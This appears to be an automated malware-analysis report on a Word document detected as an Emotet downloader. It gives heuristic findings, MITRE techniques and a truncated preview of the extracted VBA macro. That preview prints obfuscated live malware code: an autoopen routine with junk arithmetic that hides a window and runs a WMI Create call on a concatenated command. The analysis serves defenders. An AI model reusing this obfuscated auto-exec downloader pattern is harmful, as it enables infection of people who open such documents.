MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6901578-0. High-severity heuristics indicate the presence of an AutoOpen VBA macro that uses the GetObject function, a common technique for executing downloaded payloads. The extracted VBA macro, while heavily obfuscated, contains calls consistent with downloading and executing external content.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6901578-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6901578-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15739 bytes |
SHA-256: eb0e98ad1127097007e80f2728b9e18be6367855c4f4735dd10a96557f3d98f6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "bABkAAkc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "JXZkGG"
Attribute VB_Base = "0{C9E4D484-7ED1-4A9E-8AAA-FB4049FFACCA}{C13D5912-867D-4FBC-AF1A-A4B137E70440}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "JwUAAQUA"
Sub autoopen()
On Error Resume Next
If QoQAAU = FCUQoQx Then
ZA4AXAc = 740148012 * Hex(388608128) / 819101861 + Sqr(796073623) * 74742867 / CInt(683722712) * (198858864 * 195522963)
SBAwADU = (585059973 - Chr(E4AZAU4A) / FkQQQA / 872647629 + VAZDAX_ / Fix(385129007 + Log(coBAAAA * Sgn(943410672) + SD_4kDwx / CSng(263917989))))
End If
If ZAxoAxcD = kAcUC4 Then
YXBBXQw = 390307595 * Hex(487326228) / 213075158 + Sqr(390577833) * 549641298 / CInt(717307618) * (253728359 * 230103812)
nAAUAC = (632918236 - Chr(EoQxocDo) / TA4ZGAZQ / 974843141 + XCBQXQU / Fix(808848458 + Log(wZUAAB * Sgn(462879650) + XAUAQAA / CSng(560205990))))
End If
If RADDAB = KGZAUk_ Then
I1cADB4 = 374509441 * Hex(927386870) / 939820167 + Sqr(651645585) * 754383024 / CInt(442710205) * (138859583 * 480312107)
rDAGAw = (930798243 - Chr(z_GxxUA_) / VQAAZc / 717000136 + tAQxAU1k / Fix(5581353 + Log(EAQ1okGA * Sgn(934042976) + wU1ABB_ / CSng(662376054))))
End If
Set DkAXAB = GetObject(JXZkGG.KAAZDc)
If iA1Uoo4 = QAoQx4 Then
w4_oABU_ = 523199817 * Hex(499557812) / 548069906 + Sqr(806870675) * 607474438 / CInt(695773955) * (540521087 * 532145967)
MABAA1 = (732678661 - Chr(wCZXDG) / icGBBBC / 371866974 + dA4XDQ / Fix(874653699 + Log(LQCXAU_Q * Sgn(537789196) + JAwwCQ / CSng(582829857))))
End If
If wZQckABo = pQGAAA Then
WUUwQBC = 636248740 * Hex(297540682) / 22869338 + Sqr(696039598) * 779730060 / CInt(159590812) * (134932439 * 195806744)
aQAAwAA = (103566581 - Chr(z_BAAwxB) / nUwxZD / 561802303 + rGAAQUAA / Fix(271671226 + Log(UkUAcXUU * Sgn(266035210) + dCGoQA / CSng(782421513))))
End If
If IcUAAw = zkZQxAxG Then
wBQQ_AA1 = 73388702 * Hex(706924395) / 189789370 + Sqr(328632967) * 893819377 / CInt(892671759) * (86331909 * 889325534)
cAB_AAUB = (529018291 - Chr(NXBZAU) / UQCAAA4 / 544686683 + jUAAxk / Fix(260848049 + Log(K1DAw1A * Sgn(820579750) + rDZwDx_ / CSng(584442863))))
End If
DkAXAB.ShowWindow = 34847 - 34847
If rAAAAA = OcDAxA Then
HX_A_xA = 268356235 * Hex(943096616) / 863510668 + Sqr(311037146) * 61100493 / CInt(121554886) * (577288932 * 841262464)
uZDADAA = (297829257 - Chr(hDZx4AA) / SA4AAZw / 561269094 + zUAGQk / Fix(763920411 + Log(oBAcUZQX * Sgn(437270093) + WAQAAQ1G / CSng(730724163))))
End If
If NAwwAxA = fCAwAUUC Then
mAUcXC1o = 837060003 * Hex(228383076) / 646016853 + Sqr(151558691) * 671928390 / CInt(417188366) * (52432892 * 42983134)
YAUADx = (562873880 - Chr(IAB4Ax) / qBDx1ZkA / 73227912 + OAXxkD_ / Fix(383300184 + Log(PGAUoAAc * Sgn(637861944) + WAA_Qx / CSng(183742566))))
End If
If TQXAXBBQ = B4Ao4ACw Then
PQBXAw = 24443602 * Hex(454943240) / 834026292 + Sqr(708148475) * 163566224 / CInt(205525391) * (981523969 * 696999494)
hDoXAQX = (579943260 - Chr(DQoGXA) / i4AxZcA / 394101855 + rB4_ADAB / Fix(345397091 + Log(n4AAUAZB * Sgn(149652622) + zAkUBA / CSng(604959696))))
End If
GetObject(JXZkGG.aCZAkCD). _
Create# FkQAZUUo + JXZkGG.vwAZAAGA + sxAABoA + JXZkGG.a_DAAcCA + oUwAGA + JXZkGG.KAxAQA4 + MADBAAD, vGxQUcBD, DkAXAB, kkUUA4BD
If nQkCBxAG = dABCAAAU Then
tCAAc1A_ = 837316285 * Hex(921431771) / 134830364 + Sqr(385449817) * 53325057 / CInt(746166708) * (383460613 * 107103266)
mAAUcB = (428618010 - Chr(YACQAQXB) / KCBB1B / 340291954 + iDBUcA / Fix(647037553 + Log(JcG_AAG * Sgn(421305681) + LBoABBC / CSng(3766200
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.